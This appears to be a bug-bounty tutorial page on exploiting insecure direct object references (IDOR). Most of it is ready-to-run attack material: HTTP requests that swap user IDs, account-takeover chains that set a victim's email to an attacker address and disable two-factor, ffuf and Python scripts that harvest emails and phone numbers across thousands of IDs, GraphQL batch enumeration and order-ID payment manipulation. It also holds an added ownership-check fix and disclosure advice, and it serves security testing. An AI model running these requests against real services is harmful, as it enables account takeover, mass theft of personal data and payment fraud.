# IDOR Exploitation

You found an IDOR. Now demonstrate impact.

## Exploitation Patterns

### 1. Horizontal IDOR (Same Role, Different User)

Classic parameter swap:

```http
# Your request
GET /api/users/123/profile
Authorization: Bearer your_token

# Attack
GET /api/users/124/profile   # Victim's ID
Authorization: Bearer your_token
```
### 2. Vertical IDOR (Role Escalation)

Admin function access:

```http
# Normal user accessing admin endpoint
POST /api/admin/users
Authorization: Bearer normal_user_token

{"action": "create", "role": "admin"}
```
Role assignment:
### 3. Account Takeover Chains

Email change → Password reset:

```http
POST /api/users/VICTIM_ID/profile
Authorization: Bearer attacker_token

{"email": "attacker@evil.com"}
# Then trigger password reset
```

Direct password override:

```http
POST /resetPassword HTTP/1.1
Cookie: UID2=VICTIM_ID

userName=victim@example.com&newPassword=pwned123
```
## Data Exfiltration

### Mass Enumeration

```bash
# ffuf for fast enumeration
ffuf -u "https://target.com/api/users/FUZZ/data" \
  -w <(seq 1 100000) \
  -H "Authorization: Bearer $TOKEN" \
  -mc 200 -o results.json
```

### File Download IDOR

```bash
ffuf -u "http://target.com/download.php?id=FUZZ" \
  -H "Cookie: PHPSESSID=xxx" \
  -w <(seq 0 6000) \
  -fr 'File Not Found'
```

### API Response Harvesting

```python
import requests

token = "your_bearer_token"
headers = {"Authorization": f"Bearer {token}"}

for user_id in range(1, 10001):
    r = requests.get(f"https://target.com/api/users/{user_id}", headers=headers)
    if r.status_code == 200:
        data = r.json()
        print(f"{user_id}: {data.get('email')} - {data.get('phone')}")
```
## GraphQL Exploitation

### Single Query

### Batch Enumeration

```graphql
query {
  u1: user(id: "1") { email phone }
  u2: user(id: "2") { email phone }
  u3: user(id: "3") { email phone }
  # Continue for more...
}
```
## Cookie-Based IDOR

If the UID cookie and the session are validated independently, the server never ties the two together: swap the UID while keeping your own valid session and you may be served the victim's data.
## Financial Manipulation

### Order ID Swapping

```http
# Create cheap order → $1.99
POST /api/orders
{"coins": 500, "price": 199}
→ order_id: "ORDER_CHEAP"

# Create expensive order → $9.99
POST /api/orders
{"coins": 1100, "price": 999}
→ order_id: "ORDER_EXPENSIVE"

# Pay for cheap, get expensive
POST /api/checkout
{"order_id": "ORDER_CHEAP"}   # But modify to get expensive items
```
### Transaction History Access

## Multi-Step IDORs

1. Read data
2. Modify data
3. Trigger action
## Predictable Token/QR Code IDOR

Wristband QR enumeration:

```python
import requests

def to_hex(s):
    # Wristband IDs are encoded as the hex of their ASCII bytes
    return ''.join(f"{ord(c):02x}" for c in s)

for band_id in ["C-285-100", "T-544-492"]:
    hex_id = to_hex(band_id)
    r = requests.get(f"https://target.com/api?id={hex_id}")
    if "media" in r.text:
        print(band_id, r.json())
```
## Write Operations

### Modify Other Users' Data

```http
PUT /api/users/VICTIM_ID/settings
Authorization: Bearer attacker_token

{
  "notifications": false,
  "email": "attacker@evil.com",
  "two_factor": false
}
```

### Delete Other Users' Resources

### Create Resources for Other Users

```http
POST /api/users/VICTIM_ID/posts
Authorization: Bearer attacker_token

{
  "content": "Posted by attacker via IDOR"
}
```
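The server-side fix for the horizontal, cookie-based and write-operation cases above, as an added example that is not part of the original page: an in-memory Python model of the `/api/users/{id}` endpoints in which identity comes only from the server-side session and every read and write checks object ownership. The tokens, user ids and addresses are constructed sample data.

```python
# Added example, not from the original page: an in-memory model of the
# /api/users/{id} endpoints with the missing object-level check beside the fix.
# User ids, tokens and e-mail addresses are constructed sample data.
USERS = {
    123: {"role": "user", "email": "alice@example.test"},
    124: {"role": "user", "email": "bob@example.test"},
    1: {"role": "admin", "email": "admin@example.test"},
}
# Server-side session store: bearer token -> authenticated user id.
SESSIONS = {"tok_alice": 123, "tok_bob": 124, "tok_admin": 1}

class Forbidden(Exception):
    pass

def current_user_id(token: str) -> int:
    """Identity comes only from the session store, never from a UID cookie or body field."""
    uid = SESSIONS.get(token)
    if uid is None:
        raise Forbidden("invalid session")
    return uid

def get_profile_vulnerable(token: str, user_id: int) -> dict:
    """Authenticates the caller but never checks that the caller owns user_id: the IDOR."""
    current_user_id(token)
    return {"id": user_id, "email": USERS[user_id]["email"]}

def authorize(caller_id: int, user_id: int) -> None:
    """Object-level check: the caller must own the record or hold the admin role."""
    if caller_id != user_id and USERS[caller_id]["role"] != "admin":
        raise Forbidden("not owner")

def get_profile_hardened(token: str, user_id: int) -> dict:
    authorize(current_user_id(token), user_id)
    return {"id": user_id, "email": USERS[user_id]["email"]}

def update_email_hardened(token: str, user_id: int, new_email: str) -> dict:
    """Writes get the same check, so PUT /api/users/VICTIM_ID/... is refused too."""
    authorize(current_user_id(token), user_id)
    USERS[user_id]["email"] = new_email
    return {"id": user_id, "email": new_email}

def denied(fn, *args) -> bool:
    """Demonstration helper: True when the call is refused with Forbidden."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

The same `authorize` call belongs in front of every delete and create handler as well; the check is on the target object's owner, not on whether the caller is logged in.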
## Demonstrating Impact

### PoC Best Practices
- Don't mass-exploit — Show 2-3 examples max
- Redact PII — Blur/mask sensitive data in screenshots
- Document the flow — Step-by-step reproduction
- Calculate scale — "Affects all X users in database"
### Impact Statements
| Action | Impact Statement |
|---|---|
| Read PII | "Attacker can access personal data of all users" |
| Modify data | "Attacker can tamper with any user's settings/data" |
| ATO via email change | "Attacker can take over any account" |
| Financial | "Attacker can view/modify payment information" |
| Delete | "Attacker can delete any user's resources" |
## Exploitation Checklist
- Confirm IDOR works with two accounts
- Test Read/Create/Update/Delete operations
- Enumerate scale (how many records affected?)
- Check for sensitive data exposure
- Try ATO chains (email change → password reset)
- Document with screenshots
- Estimate total impact
Hit validation? Check Bypasses.
Ready to maximize impact? Move to Escalation.